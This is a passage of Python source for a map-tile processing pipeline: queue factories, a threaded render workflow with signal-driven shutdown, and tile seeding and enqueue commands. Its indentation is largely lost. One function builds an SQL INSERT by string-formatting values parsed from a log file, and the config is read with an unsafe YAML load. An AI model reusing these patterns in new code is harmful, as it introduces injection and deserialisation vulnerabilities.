if not inflight_yaml:
from tilequeue.queue.inflight import NoopInFlightManager
return NoopInFlightManager()
inflight_type = inflight_yaml.get('type')
assert inflight_type, 'Missing inflight type config'
if inflight_type == 'redis':
assert redis_client, 'redis client required for redis inflight manager'
inflight_key = 'tilequeue.in-flight'
inflight_redis_cfg = inflight_yaml.get('redis')
if inflight_redis_cfg:
inflight_key = inflight_redis_cfg.get('key') or inflight_key
from tilequeue.queue.inflight import RedisInFlightManager
return RedisInFlightManager(redis_client, inflight_key)
else:
assert 0, 'Unknown inflight type: %s' % inflight_type
def make_visibility_mgr_from_cfg(visibility_yaml):
assert visibility_yaml, 'Missing message-visibility config'
extend_secs = visibility_yaml.get('extend-seconds')
assert extend_secs > 0, \
'Invalid message-visibility extend-seconds'
max_secs = visibility_yaml.get('max-seconds')
assert max_secs is not None, \
'Invalid message-visibility max-seconds'
timeout_secs = visibility_yaml.get('timeout-seconds')
assert timeout_secs is not None, \
'Invalid message-visibility timeout-seconds'
visibility_extend_mgr = make_visibility_manager(
extend_secs, max_secs, timeout_secs)
return visibility_extend_mgr
def make_sqs_queue_from_cfg(name, queue_yaml_cfg, visibility_mgr):
region = queue_yaml_cfg.get('region')
assert region, 'Missing queue sqs region'
tile_queue = make_sqs_queue(name, region, visibility_mgr)
return tile_queue
def make_tile_queue(queue_yaml_cfg, all_cfg, redis_client=None):
    # Returns a single (tile_queue, name) pair, or a list of such pairs.
    # Alternatively, maybe queue implementations should be forced to know
    # their own names?
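    # For example (keys taken from the branches below), a yaml entry like
    # {name: tiles, type: mem} yields one (tile_queue, name) pair, while a
    # list of such entries yields a list of pairs.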
if isinstance(queue_yaml_cfg, list):
result = []
for queue_item_cfg in queue_yaml_cfg:
tile_queue, name = make_tile_queue(
queue_item_cfg, all_cfg, redis_client)
result.append((tile_queue, name))
return result
else:
queue_name = queue_yaml_cfg.get('name')
assert queue_name, 'Missing queue name'
queue_type = queue_yaml_cfg.get('type')
assert queue_type, 'Missing queue type'
if queue_type == 'sqs':
sqs_cfg = queue_yaml_cfg.get('sqs')
assert sqs_cfg, 'Missing queue sqs config'
visibility_yaml = all_cfg.get('message-visibility')
visibility_mgr = make_visibility_mgr_from_cfg(visibility_yaml)
tile_queue = make_sqs_queue_from_cfg(queue_name, sqs_cfg,
visibility_mgr)
elif queue_type == 'mem':
from tilequeue.queue import MemoryQueue
tile_queue = MemoryQueue()
elif queue_type == 'file':
from tilequeue.queue import OutputFileQueue
if os.path.exists(queue_name):
assert os.path.isfile(queue_name), \
('Could not create file queue. `./{}` is not a '
'file!'.format(queue_name))
fp = open(queue_name, 'a+')
tile_queue = OutputFileQueue(fp)
elif queue_type == 'stdout':
# only support writing
from tilequeue.queue import OutputFileQueue
tile_queue = OutputFileQueue(sys.stdout)
elif queue_type == 'redis':
assert redis_client, 'redis_client required for redis tile_queue'
from tilequeue.queue import make_redis_queue
tile_queue = make_redis_queue(redis_client, queue_name)
else:
raise ValueError('Unknown queue type: %s' % queue_type)
return tile_queue, queue_name
def make_msg_tracker(msg_tracker_yaml, logger):
if not msg_tracker_yaml:
from tilequeue.queue.message import SingleMessagePerCoordTracker
return SingleMessagePerCoordTracker()
else:
msg_tracker_type = msg_tracker_yaml.get('type')
assert msg_tracker_type, 'Missing message tracker type'
if msg_tracker_type == 'single':
from tilequeue.queue.message import SingleMessagePerCoordTracker
return SingleMessagePerCoordTracker()
elif msg_tracker_type == 'multiple':
from tilequeue.queue.message import MultipleMessagesPerCoordTracker
from tilequeue.log import MultipleMessagesTrackerLogger
msg_tracker_logger = MultipleMessagesTrackerLogger(logger)
return MultipleMessagesPerCoordTracker(msg_tracker_logger)
else:
assert 0, 'Unknown message tracker type: %s' % msg_tracker_type
def make_toi_helper(cfg):
if cfg.toi_store_type == 's3':
from tilequeue.toi import S3TilesOfInterestSet
return S3TilesOfInterestSet(
cfg.toi_store_s3_bucket,
cfg.toi_store_s3_key,
)
elif cfg.toi_store_type == 'file':
from tilequeue.toi import FileTilesOfInterestSet
return FileTilesOfInterestSet(
cfg.toi_store_file_name,
)
def make_redis_client(cfg):
from redis import StrictRedis
redis_client = StrictRedis(cfg.redis_host, cfg.redis_port, cfg.redis_db)
return redis_client
def make_logger(cfg, logger_name, loglevel=logging.INFO):
    if getattr(cfg, 'logconfig', None) is not None:
logging.config.fileConfig(cfg.logconfig)
logger = logging.getLogger(logger_name)
logger.setLevel(loglevel)
return logger
def make_seed_tile_generator(cfg):
if cfg.seed_all_zoom_start is not None:
assert cfg.seed_all_zoom_until is not None
all_tiles = seed_tiles(cfg.seed_all_zoom_start,
cfg.seed_all_zoom_until)
else:
all_tiles = ()
if cfg.seed_metro_extract_url:
assert cfg.seed_metro_extract_zoom_start is not None
assert cfg.seed_metro_extract_zoom_until is not None
with closing(urlopen(cfg.seed_metro_extract_url)) as fp:
# will raise a MetroExtractParseError on failure
metro_extracts = parse_metro_extract(fp)
city_filter = cfg.seed_metro_extract_cities
if city_filter is not None:
metro_extracts = [
city for city in metro_extracts if city.city in city_filter]
multiple_bounds = city_bounds(metro_extracts)
metro_extract_tiles = tile_generator_for_multiple_bounds(
multiple_bounds, cfg.seed_metro_extract_zoom_start,
cfg.seed_metro_extract_zoom_until)
else:
metro_extract_tiles = ()
if cfg.seed_top_tiles_url:
assert cfg.seed_top_tiles_zoom_start is not None
assert cfg.seed_top_tiles_zoom_until is not None
with closing(urlopen(cfg.seed_top_tiles_url)) as fp:
top_tiles = parse_top_tiles(
fp, cfg.seed_top_tiles_zoom_start,
cfg.seed_top_tiles_zoom_until)
else:
top_tiles = ()
if cfg.seed_custom_bboxes:
assert cfg.seed_custom_zoom_start is not None
assert cfg.seed_custom_zoom_until is not None
custom_tiles = tile_generator_for_multiple_bounds(
cfg.seed_custom_bboxes, cfg.seed_custom_zoom_start,
cfg.seed_custom_zoom_until)
else:
custom_tiles = ()
combined_tiles = chain(
all_tiles, metro_extract_tiles, top_tiles, custom_tiles)
if cfg.seed_unique:
tile_generator = uniquify_generator(combined_tiles)
else:
tile_generator = combined_tiles
return tile_generator
def _make_store(cfg,
s3_role_arn=None,
s3_role_session_duration_s=None,
logger=None):
store_cfg = cfg.yml.get('store')
assert store_cfg, "Store was not configured, but is necessary."
if logger is None:
logger = make_logger(cfg, 'process')
store = make_store(store_cfg,
s3_role_arn=s3_role_arn,
s3_role_session_duration_s=s3_role_session_duration_s,
logger=logger)
return store
def explode_and_intersect(coord_ints, tiles_of_interest, until=0):
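    # Each incoming coordinate already present in the tiles of interest counts
    # as a hit and is kept; a miss is zoomed up one level (stopping at `until`)
    # and re-checked on the next pass, so an ancestor can still match before
    # the coordinate is dropped.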
next_coord_ints = coord_ints
coord_ints_at_parent_zoom = set()
total_coord_ints = []
# to capture metrics
total = 0
hits = 0
misses = 0
while True:
for coord_int in next_coord_ints:
total += 1
if coord_int in tiles_of_interest:
hits += 1
total_coord_ints.append(coord_int)
else:
misses += 1
zoom = zoom_mask & coord_int
if zoom > until:
parent_coord_int = coord_int_zoom_up(coord_int)
coord_ints_at_parent_zoom.add(parent_coord_int)
if not coord_ints_at_parent_zoom:
break
next_coord_ints = coord_ints_at_parent_zoom
coord_ints_at_parent_zoom = set()
metrics = dict(
total=total,
hits=hits,
misses=misses,
n_toi=len(tiles_of_interest),
)
return total_coord_ints, metrics
def coord_ints_from_paths(paths):
coord_set = set()
path_counts = []
for path in paths:
path_count = 0
with open(path) as fp:
coords = create_coords_generator_from_tiles_file(fp)
for coord in coords:
coord_int = coord_marshall_int(coord)
coord_set.add(coord_int)
path_count += 1
path_counts.append((path, path_count))
result = dict(
coord_set=coord_set,
path_counts=path_counts,
)
return result
def _parse_postprocess_resources(post_process_item, cfg_path):
resources_cfg = post_process_item.get('resources', {})
resources = {}
for resource_name, resource_cfg in resources_cfg.iteritems():
resource_type = resource_cfg.get('type')
init_fn_name = resource_cfg.get('init_fn')
assert resource_type, 'Missing type in resource %r' \
% resource_name
assert init_fn_name, 'Missing init function name in ' \
'resource %r' % resource_name
try:
fn = resolve(init_fn_name)
except Exception:
raise Exception('Unable to init resource %r with function %r due '
'to %s' % (resource_name, init_fn_name,
"".join(traceback.format_exception(
*sys.exc_info()))))
if resource_type == 'file':
path = resource_cfg.get('path')
assert path, 'Resource %r of type file is missing the ' \
'path parameter' % resource_name
with open(os.path.join(cfg_path, path), 'r') as fh:
resources[resource_name] = fn(fh)
else:
raise Exception('Resource type %r is not supported'
% resource_type)
return resources
SourcesConfig = namedtuple('SourcesConfig', 'sources queries_generator')
def parse_layer_data(query_cfg, buffer_cfg, cfg_path):
all_layer_names = query_cfg['all']
layers_config = query_cfg['layers']
post_process_config = query_cfg.get('post_process', [])
layer_data = []
all_layer_data = []
post_process_data = []
for layer_name, layer_config in layers_config.items():
area_threshold = int(layer_config.get('area-inclusion-threshold', 1))
layer_datum = dict(
name=layer_name,
is_clipped=layer_config.get('clip', True),
clip_factor=layer_config.get('clip_factor', 1.0),
geometry_types=layer_config['geometry_types'],
transform_fn_names=layer_config.get('transform', []),
sort_fn_name=layer_config.get('sort'),
simplify_before_intersect=layer_config.get(
'simplify_before_intersect', False),
simplify_start=layer_config.get('simplify_start', 0),
area_threshold=area_threshold,
query_bounds_pad_fn=create_query_bounds_pad_fn(
buffer_cfg, layer_name),
tolerance=float(layer_config.get('tolerance', 1.0)),
)
layer_data.append(layer_datum)
if layer_name in all_layer_names:
all_layer_data.append(layer_datum)
for post_process_item in post_process_config:
fn_name = post_process_item.get('fn')
assert fn_name, 'Missing post process config fn'
params = post_process_item.get('params')
if params is None:
params = {}
resources = _parse_postprocess_resources(post_process_item, cfg_path)
post_process_data.append(dict(
fn_name=fn_name,
params=dict(params),
resources=resources))
return all_layer_data, layer_data, post_process_data
def make_output_calc_mapping(process_yaml_cfg):
output_calc_mapping = {}
if process_yaml_cfg['type'] == 'parse':
parse_cfg = process_yaml_cfg['parse']
yaml_path = parse_cfg['path']
assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
from vectordatasource.meta.python import make_function_name_props
from vectordatasource.meta.python import output_kind
from vectordatasource.meta.python import parse_layers
layer_parse_result = parse_layers(
yaml_path, output_kind, make_function_name_props)
for layer_datum in layer_parse_result.layer_data:
output_calc_mapping[layer_datum.layer] = layer_datum.fn
elif process_yaml_cfg['type'] == 'callable':
callable_cfg = process_yaml_cfg['callable']
dotted_name = callable_cfg['dotted-name']
fn = resolve(dotted_name)
output_calc_mapping = fn(*callable_cfg['args'])
else:
raise ValueError('Invalid process yaml config: %s' % process_yaml_cfg)
return output_calc_mapping
def make_min_zoom_calc_mapping(process_yaml_cfg):
# can't handle "callable" type - how do we get the min zoom fn?
assert process_yaml_cfg['type'] == 'parse'
min_zoom_calc_mapping = {}
parse_cfg = process_yaml_cfg['parse']
yaml_path = parse_cfg['path']
assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
from vectordatasource.meta.python import make_function_name_min_zoom
from vectordatasource.meta.python import output_min_zoom
from vectordatasource.meta.python import parse_layers
layer_parse_result = parse_layers(
yaml_path, output_min_zoom, make_function_name_min_zoom)
for layer_datum in layer_parse_result.layer_data:
min_zoom_calc_mapping[layer_datum.layer] = layer_datum.fn
return min_zoom_calc_mapping
def tilequeue_process(cfg, peripherals):
from tilequeue.log import JsonTileProcessingLogger
logger = make_logger(cfg, 'process')
tile_proc_logger = JsonTileProcessingLogger(logger)
tile_proc_logger.lifecycle('tilequeue processing started')
assert os.path.exists(cfg.query_cfg), \
'Invalid query config path'
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
formats = lookup_formats(cfg.output_formats)
store = _make_store(cfg)
assert cfg.postgresql_conn_info, 'Missing postgresql connection info'
from shapely import speedups
if speedups.available:
speedups.enable()
tile_proc_logger.lifecycle('Shapely speedups enabled')
else:
tile_proc_logger.lifecycle(
'Shapely speedups not enabled, they were not available')
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
n_cpu = multiprocessing.cpu_count()
n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
if not n_simultaneous_query_sets:
# default to number of databases configured
n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
assert n_simultaneous_query_sets > 0
# reduce queue size when we're rendering metatiles to try and avoid the
# geometry waiting to be processed from taking up all the RAM!
size_sqr = (cfg.metatile_size or 1)**2
default_queue_buffer_size = max(1, 16 / size_sqr)
sql_queue_buffer_size = cfg.sql_queue_buffer_size or \
default_queue_buffer_size
proc_queue_buffer_size = cfg.proc_queue_buffer_size or \
default_queue_buffer_size
s3_queue_buffer_size = cfg.s3_queue_buffer_size or \
default_queue_buffer_size
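    # For example, with cfg.metatile_size == 2 the divisor size_sqr is 4, so
    # any buffer size left unconfigured defaults to max(1, 16 / 4) == 4; with
    # metatile_size unset it stays at 16.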
n_layers = len(all_layer_data)
n_formats = len(formats)
n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
if not n_simultaneous_s3_storage:
n_simultaneous_s3_storage = max(n_cpu / 2, 1)
assert n_simultaneous_s3_storage > 0
# thread pool used for queries and uploading to s3
n_total_needed_query = n_layers * n_simultaneous_query_sets
n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
n_total_needed = n_total_needed_query + n_total_needed_s3
n_max_io_workers = 50
n_io_workers = min(n_total_needed, n_max_io_workers)
io_pool = ThreadPool(n_io_workers)
feature_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
# create all queues used to manage pipeline
# holds coordinate messages from tile queue reader
    # TODO: this hardcoded size could move to configuration.
    # Keeping it a little below what is needed is deliberate: it is better to
    # read from the queue on demand than to hold messages waiting while other
    # work finishes, since held messages can go stale.
tile_input_queue = Queue.Queue(10)
# holds raw sql results - no filtering or processing done on them
sql_data_fetch_queue = multiprocessing.Queue(sql_queue_buffer_size)
# holds data after it has been filtered and processed
# this is where the cpu intensive part of the operation will happen
# the results will be data that is formatted for each necessary format
processor_queue = multiprocessing.Queue(proc_queue_buffer_size)
# holds data after it has been sent to s3
s3_store_queue = Queue.Queue(s3_queue_buffer_size)
# create worker threads/processes
thread_tile_queue_reader_stop = threading.Event()
queue_mapper = peripherals.queue_mapper
msg_marshaller = peripherals.msg_marshaller
msg_tracker_yaml = cfg.yml.get('message-tracker')
msg_tracker = make_msg_tracker(msg_tracker_yaml, logger)
from tilequeue.stats import TileProcessingStatsHandler
stats_handler = TileProcessingStatsHandler(peripherals.stats)
tile_queue_reader = TileQueueReader(
queue_mapper, msg_marshaller, msg_tracker, tile_input_queue,
tile_proc_logger, stats_handler, thread_tile_queue_reader_stop,
cfg.max_zoom, cfg.group_by_zoom)
data_fetch = DataFetch(
feature_fetcher, tile_input_queue, sql_data_fetch_queue, io_pool,
tile_proc_logger, stats_handler, cfg.metatile_zoom, cfg.max_zoom,
cfg.metatile_start_zoom)
data_processor = ProcessAndFormatData(
post_process_data, formats, sql_data_fetch_queue, processor_queue,
cfg.buffer_cfg, output_calc_mapping, layer_data, tile_proc_logger,
stats_handler)
s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool, store,
tile_proc_logger, cfg.metatile_size)
thread_tile_writer_stop = threading.Event()
tile_queue_writer = TileQueueWriter(
queue_mapper, s3_store_queue, peripherals.inflight_mgr,
msg_tracker, tile_proc_logger, stats_handler,
thread_tile_writer_stop)
def create_and_start_thread(fn, *args):
t = threading.Thread(target=fn, args=args)
t.start()
return t
thread_tile_queue_reader = create_and_start_thread(tile_queue_reader)
threads_data_fetch = []
threads_data_fetch_stop = []
for i in range(n_simultaneous_query_sets):
thread_data_fetch_stop = threading.Event()
thread_data_fetch = create_and_start_thread(data_fetch,
thread_data_fetch_stop)
threads_data_fetch.append(thread_data_fetch)
threads_data_fetch_stop.append(thread_data_fetch_stop)
# create a data processor per cpu
n_data_processors = n_cpu
data_processors = []
data_processors_stop = []
for i in range(n_data_processors):
data_processor_stop = multiprocessing.Event()
process_data_processor = multiprocessing.Process(
target=data_processor, args=(data_processor_stop,))
process_data_processor.start()
data_processors.append(process_data_processor)
data_processors_stop.append(data_processor_stop)
threads_s3_storage = []
threads_s3_storage_stop = []
for i in range(n_simultaneous_s3_storage):
thread_s3_storage_stop = threading.Event()
thread_s3_storage = create_and_start_thread(s3_storage,
thread_s3_storage_stop)
threads_s3_storage.append(thread_s3_storage)
threads_s3_storage_stop.append(thread_s3_storage_stop)
thread_tile_writer = create_and_start_thread(tile_queue_writer)
if cfg.log_queue_sizes:
assert(cfg.log_queue_sizes_interval_seconds > 0)
queue_data = (
(tile_input_queue, 'queue'),
(sql_data_fetch_queue, 'sql'),
(processor_queue, 'proc'),
(s3_store_queue, 's3'),
)
queue_printer_thread_stop = threading.Event()
queue_printer = QueuePrint(
cfg.log_queue_sizes_interval_seconds, queue_data, tile_proc_logger,
queue_printer_thread_stop)
queue_printer_thread = create_and_start_thread(queue_printer)
else:
queue_printer_thread = None
queue_printer_thread_stop = None
def stop_all_workers(signum, stack):
tile_proc_logger.lifecycle('tilequeue processing shutdown ...')
tile_proc_logger.lifecycle(
'requesting all workers (threads and processes) stop ...')
# each worker guards its read loop with an event object
# ask all these to stop first
thread_tile_queue_reader_stop.set()
for thread_data_fetch_stop in threads_data_fetch_stop:
thread_data_fetch_stop.set()
for data_processor_stop in data_processors_stop:
data_processor_stop.set()
for thread_s3_storage_stop in threads_s3_storage_stop:
thread_s3_storage_stop.set()
thread_tile_writer_stop.set()
if queue_printer_thread_stop:
queue_printer_thread_stop.set()
tile_proc_logger.lifecycle(
'requesting all workers (threads and processes) stop ... done')
# Once workers receive a stop event, they will keep reading
# from their queues until they receive a sentinel value. This
# is mandatory so that no messages will remain on queues when
# asked to join. Otherwise, we never terminate.
tile_proc_logger.lifecycle('joining all workers ...')
tile_proc_logger.lifecycle('joining tile queue reader ...')
thread_tile_queue_reader.join()
tile_proc_logger.lifecycle('joining tile queue reader ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinels for data fetchers ...')
for i in range(len(threads_data_fetch)):
tile_input_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for data fetchers ... done')
tile_proc_logger.lifecycle('joining data fetchers ...')
for thread_data_fetch in threads_data_fetch:
thread_data_fetch.join()
tile_proc_logger.lifecycle('joining data fetchers ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinels for data processors ...')
for i in range(len(data_processors)):
sql_data_fetch_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for data processors ... done')
tile_proc_logger.lifecycle('joining data processors ...')
for data_processor in data_processors:
data_processor.join()
tile_proc_logger.lifecycle('joining data processors ... done')
tile_proc_logger.lifecycle('enqueueing sentinels for s3 storage ...')
for i in range(len(threads_s3_storage)):
processor_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for s3 storage ... done')
tile_proc_logger.lifecycle('joining s3 storage ...')
for thread_s3_storage in threads_s3_storage:
thread_s3_storage.join()
tile_proc_logger.lifecycle('joining s3 storage ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinel for tile queue writer ...')
s3_store_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinel for tile queue writer ... done')
tile_proc_logger.lifecycle('joining tile queue writer ...')
thread_tile_writer.join()
tile_proc_logger.lifecycle('joining tile queue writer ... done')
if queue_printer_thread:
tile_proc_logger.lifecycle('joining queue printer ...')
queue_printer_thread.join()
tile_proc_logger.lifecycle('joining queue printer ... done')
tile_proc_logger.lifecycle('joining all workers ... done')
tile_proc_logger.lifecycle('joining io pool ...')
io_pool.close()
io_pool.join()
tile_proc_logger.lifecycle('joining io pool ... done')
tile_proc_logger.lifecycle('joining multiprocess data fetch queue ...')
sql_data_fetch_queue.close()
sql_data_fetch_queue.join_thread()
tile_proc_logger.lifecycle(
'joining multiprocess data fetch queue ... done')
tile_proc_logger.lifecycle('joining multiprocess process queue ...')
processor_queue.close()
processor_queue.join_thread()
tile_proc_logger.lifecycle(
'joining multiprocess process queue ... done')
tile_proc_logger.lifecycle('tilequeue processing shutdown ... done')
sys.exit(0)
signal.signal(signal.SIGTERM, stop_all_workers)
signal.signal(signal.SIGINT, stop_all_workers)
signal.signal(signal.SIGQUIT, stop_all_workers)
tile_proc_logger.lifecycle('all tilequeue threads and processes started')
# this is necessary for the main thread to receive signals
# when joining on threads/processes, the signal is never received
# http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
while True:
time.sleep(1024)
def coords_generator_from_queue(queue):
"""given a python queue, read from it and yield coordinates"""
while True:
coord = queue.get()
if coord is None:
break
yield coord
def tilequeue_seed(cfg, peripherals):
logger = make_logger(cfg, 'seed')
logger.info('Seeding tiles ...')
queue_writer = peripherals.queue_writer
# based on cfg, create tile generator
tile_generator = make_seed_tile_generator(cfg)
queue_buf_size = 1024
tile_queue_queue = Queue.Queue(queue_buf_size)
# updating tile queue happens in background threads
def tile_queue_enqueue():
coords = coords_generator_from_queue(tile_queue_queue)
queue_writer.enqueue_batch(coords)
logger.info('Enqueueing ... ')
thread_enqueue = threading.Thread(target=tile_queue_enqueue)
thread_enqueue.start()
n_coords = 0
for coord in tile_generator:
tile_queue_queue.put(coord)
n_coords += 1
if n_coords % 100000 == 0:
logger.info('%d enqueued' % n_coords)
tile_queue_queue.put(None)
thread_enqueue.join()
logger.info('Enqueueing ... done')
if cfg.seed_should_add_to_tiles_of_interest:
logger.info('Adding to Tiles of Interest ... ')
if (cfg.toi_store_type == 'file' and
not os.path.exists(cfg.toi_store_file_name)):
toi_set = set()
else:
toi_set = peripherals.toi.fetch_tiles_of_interest()
tile_generator = make_seed_tile_generator(cfg)
for coord in tile_generator:
coord_int = coord_marshall_int(coord)
toi_set.add(coord_int)
peripherals.toi.set_tiles_of_interest(toi_set)
emit_toi_stats(toi_set, peripherals)
logger.info('Adding to Tiles of Interest ... done')
logger.info('Seeding tiles ... done')
logger.info('%d coordinates enqueued' % n_coords)
def tilequeue_enqueue_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'enqueue_tiles_of_interest')
logger.info('Enqueueing tiles of interest')
logger.info('Fetching tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching tiles of interest ... done')
coords = []
for coord_int in tiles_of_interest:
coord = coord_unmarshall_int(coord_int)
if coord.zoom <= cfg.max_zoom:
coords.append(coord)
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(coords)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_stdin(cfg, peripherals):
logger = make_logger(cfg, 'enqueue_stdin')
def _stdin_coord_generator():
for line in sys.stdin:
line = line.strip()
coord = deserialize_coord(line)
if coord is not None:
yield coord
queue_writer = peripherals.queue_writer
coords = _stdin_coord_generator()
n_queued, n_in_flight = queue_writer.enqueue_batch(coords)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
def coord_pyramid(coord, zoom_start, zoom_stop):
"""
generate full pyramid for coord
Generate the full pyramid for a single coordinate. Note that zoom_stop is
exclusive.
"""
if zoom_start <= coord.zoom:
yield coord
for child_coord in coord_children_range(coord, zoom_stop):
if zoom_start <= child_coord.zoom:
yield child_coord
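# For example (zoom_stop being exclusive, per the docstring), calling
# coord_pyramid on a z10 coordinate with zoom_start=10 and zoom_stop=12 yields
# the z10 coordinate followed by its z11 descendants; raising zoom_start to 11
# drops the z10 parent but keeps the z11 children.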
def coord_pyramids(coords, zoom_start, zoom_stop):
"""
generate full pyramid for coords
Generate the full pyramid for the list of coords. Note that zoom_stop is
exclusive.
"""
for coord in coords:
for child in coord_pyramid(coord, zoom_start, zoom_stop):
yield child
def tilequeue_enqueue_full_pyramid_from_toi(cfg, peripherals, args):
"""enqueue a full pyramid from the z10 toi"""
logger = make_logger(cfg, 'enqueue_tiles_of_interest')
logger.info('Enqueueing tiles of interest')
logger.info('Fetching tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching tiles of interest ... done')
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml, 'Missing rawr yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom, 'Missing rawr group-zoom'
assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
if args.zoom_start is None:
zoom_start = group_by_zoom
else:
zoom_start = args.zoom_start
if args.zoom_stop is None:
zoom_stop = cfg.max_zoom + 1 # +1 because exclusive
else:
zoom_stop = args.zoom_stop
assert zoom_start >= group_by_zoom
assert zoom_stop > zoom_start
ungrouped = []
coords_at_group_zoom = set()
for coord_int in tiles_of_interest:
coord = coord_unmarshall_int(coord_int)
if coord.zoom < zoom_start:
ungrouped.append(coord)
if coord.zoom >= group_by_zoom:
coord_at_group_zoom = coord.zoomTo(group_by_zoom).container()
coords_at_group_zoom.add(coord_at_group_zoom)
pyramids = coord_pyramids(coords_at_group_zoom, zoom_start, zoom_stop)
coords_to_enqueue = chain(ungrouped, pyramids)
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(coords_to_enqueue)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_random_pyramids(cfg, peripherals, args):
"""enqueue random pyramids"""
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
logger = make_logger(cfg, 'enqueue_random_pyramids')
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml, 'Missing rawr yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom, 'Missing rawr group-zoom'
assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
if args.zoom_start is None:
zoom_start = group_by_zoom
else:
zoom_start = args.zoom_start
if args.zoom_stop is None:
zoom_stop = cfg.max_zoom + 1 # +1 because exclusive
else:
zoom_stop = args.zoom_stop
assert zoom_start >= group_by_zoom
assert zoom_stop > zoom_start
gridsize = args.gridsize
total_samples = getattr(args, 'n-samples')
samples_per_cell = total_samples / (gridsize * gridsize)
tileset_dim = 2 ** group_by_zoom
scale_factor = float(tileset_dim) / float(gridsize)
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller)
for grid_y in xrange(gridsize):
tile_y_min = int(grid_y * scale_factor)
tile_y_max = int((grid_y+1) * scale_factor)
for grid_x in xrange(gridsize):
tile_x_min = int(grid_x * scale_factor)
tile_x_max = int((grid_x+1) * scale_factor)
cell_samples = set()
for i in xrange(samples_per_cell):
while True:
rand_x = randrange(tile_x_min, tile_x_max)
rand_y = randrange(tile_y_min, tile_y_max)
sample = rand_x, rand_y
if sample in cell_samples:
continue
cell_samples.add(sample)
break
# enqueue a cell at a time
# the queue mapper expects to be able to read the entirety of the
# input into memory first
for x, y in cell_samples:
coord = Coordinate(zoom=group_by_zoom, column=x, row=y)
pyramid = coord_pyramid(coord, zoom_start, zoom_stop)
rawr_enqueuer(pyramid)
def tilequeue_consume_tile_traffic(cfg, peripherals):
logger = make_logger(cfg, 'consume_tile_traffic')
logger.info('Consuming tile traffic logs ...')
tile_log_records = None
with open(cfg.tile_traffic_log_path, 'r') as log_file:
tile_log_records = parse_log_file(log_file)
if not tile_log_records:
logger.info("Couldn't parse log file")
sys.exit(1)
conn_info = dict(cfg.postgresql_conn_info)
dbnames = conn_info.pop('dbnames')
sql_conn_pool = DBConnectionPool(dbnames, conn_info, False)
sql_conn = sql_conn_pool.get_conns(1)[0]
with sql_conn.cursor() as cursor:
# insert the log records after the latest_date
cursor.execute('SELECT max(date) from tile_traffic_v4')
max_timestamp = cursor.fetchone()[0]
n_coords_inserted = 0
for host, timestamp, coord_int in tile_log_records:
if not max_timestamp or timestamp > max_timestamp:
coord = coord_unmarshall_int(coord_int)
cursor.execute(
"INSERT into tile_traffic_v4 "
"(date, z, x, y, tilesize, service, host) VALUES "
"('%s', %d, %d, %d, %d, '%s', '%s')"
% (timestamp, coord.zoom, coord.column, coord.row, 512,
'vector-tiles', host))
n_coords_inserted += 1
logger.info('Inserted %d records' % n_coords_inserted)
sql_conn_pool.put_conns([sql_conn])
def emit_toi_stats(toi_set, peripherals):
"""
Calculates new TOI stats and emits them via statsd.
"""
count_by_zoom = defaultdict(int)
total = 0
for coord_int in toi_set:
coord = coord_unmarshall_int(coord_int)
count_by_zoom[coord.zoom] += 1
total += 1
peripherals.stats.gauge('tiles-of-interest.count', total)
for zoom, count in count_by_zoom.items():
peripherals.stats.gauge(
'tiles-of-interest.by-zoom.z{:02d}'.format(zoom),
count
)
def tilequeue_prune_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'prune_tiles_of_interest')
logger.info('Pruning tiles of interest ...')
time_overall = peripherals.stats.timer('gardener.overall')
time_overall.start()
logger.info('Fetching tiles recently requested ...')
import psycopg2
prune_cfg = cfg.yml.get('toi-prune', {})
tile_history_cfg = prune_cfg.get('tile-history', {})
db_conn_info = tile_history_cfg.get('database-uri')
assert db_conn_info, ("A postgres-compatible connection URI must "
"be present in the config yaml")
redshift_days_to_query = tile_history_cfg.get('days')
assert redshift_days_to_query, ("Number of days to query "
"redshift is not specified")
redshift_zoom_cutoff = int(tile_history_cfg.get('max-zoom', '16'))
# flag indicating that s3 entry in toi-prune is used for s3 store
legacy_fallback = 's3' in prune_cfg
